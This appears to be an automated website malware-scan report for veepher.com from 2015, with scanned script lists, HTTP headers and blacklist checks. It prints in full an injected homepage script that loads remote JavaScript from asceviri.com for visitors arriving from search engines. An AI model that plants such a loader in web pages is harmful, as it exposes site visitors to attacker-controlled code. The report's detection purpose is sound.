Scanned pages/files
| Request | Server response | Status |
http://veepher.com/ | 200 OK Content-Length: 27289 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: asceviri.com var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://asceviri.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');} Decoded script: 10 /*** called setTimeout with 10, undefined */ | ||
http://veepher.com/media/jui/js/jquery.min.js | 200 OK Content-Length: 95957 Content-Type: application/javascript | clean |
http://veepher.com/media/jui/js/jquery-noconflict.js | 200 OK Content-Length: 20 Content-Type: application/javascript | clean |
http://veepher.com/media/jui/js/jquery-migrate.min.js | 200 OK Content-Length: 7199 Content-Type: application/javascript | clean |
http://veepher.com/media/jui/js/bootstrap.min.js | 200 OK Content-Length: 29156 Content-Type: application/javascript | clean |
http://veepher.com/media/techjoomla_strapper/js/namespace.js | 200 OK Content-Length: 138 Content-Type: application/javascript | clean |
http://veepher.com/media/system/js/mootools-core.js | 200 OK Content-Length: 83689 Content-Type: application/javascript | clean |
http://veepher.com/media/system/js/core.js | 200 OK Content-Length: 4055 Content-Type: application/javascript | clean |
http://veepher.com/media/system/js/mootools-more.js | 200 OK Content-Length: 232849 Content-Type: application/javascript | clean |
http://veepher.com/plugins/system/jsntplframework/assets/joomlashine/js/noconflict.js | 200 OK Content-Length: 54 Content-Type: application/javascript | clean |
http://veepher.com/plugins/system/jsntplframework/assets/joomlashine/js/utils.js | 200 OK Content-Length: 32807 Content-Type: application/javascript | clean |
http://veepher.com/templates/jsn_dona_pro/js/jsn_template.js | 200 OK Content-Length: 2025 Content-Type: application/javascript | clean |
http://veepher.com/media/system/js/modal.js | 200 OK Content-Length: 9974 Content-Type: application/javascript | clean |
http://veepher.com/templates/jsn_dona_pro/js/custom.js | 200 OK Content-Length: 3349 Content-Type: application/javascript | clean |
http://veepher.com/media/foundry/4.0/config/fa43e4ffaab66d4290638d494215ff47.js | 200 OK Content-Length: 3057 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: veepher.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Dec 2015 07:51:17 GMT
Server: cloudflare-nginx
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
CF-RAY: 259ab8542d0c2afd-WAW
Set-Cookie: __cfduid=dcd3bf1552cc9bf704ff2d852675aa0771450943475; expires=Fri, 23-Dec-16 07:51:15 GMT; path=/; domain=.veepher.com; HttpOnly
Set-Cookie: ea2cd40257b5ae73454c921c0ea376ae=e615e7c5e9774d9a2a5a257643bd0ab8; path=/; HttpOnly
Set-Cookie: fbcb3545b6098bf40c40f1e9484a4ac8=en-GB; path=/
X-Powered-By: PHP/5.4.39
GET / HTTP/1.1
Host: veepher.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Dec 2015 07:51:17 GMT
Server: cloudflare-nginx
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
CF-RAY: 259ab8542d0c2afd-WAW
Set-Cookie: __cfduid=dcd3bf1552cc9bf704ff2d852675aa0771450943475; expires=Fri, 23-Dec-16 07:51:15 GMT; path=/; domain=.veepher.com; HttpOnly
Set-Cookie: ea2cd40257b5ae73454c921c0ea376ae=e615e7c5e9774d9a2a5a257643bd0ab8; path=/; HttpOnly
Set-Cookie: fbcb3545b6098bf40c40f1e9484a4ac8=en-GB; path=/
X-Powered-By: PHP/5.4.39
Second query (visit from search engine):
GET / HTTP/1.1
Host: veepher.com
Referer: http://www.google.com/search?q=veepher.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: veepher.com
Referer: http://www.google.com/search?q=veepher.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=veepher.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://veepher.com/
Result: veepher.com is not infected or malware details are not published yet.
Result: veepher.com is not infected or malware details are not published yet.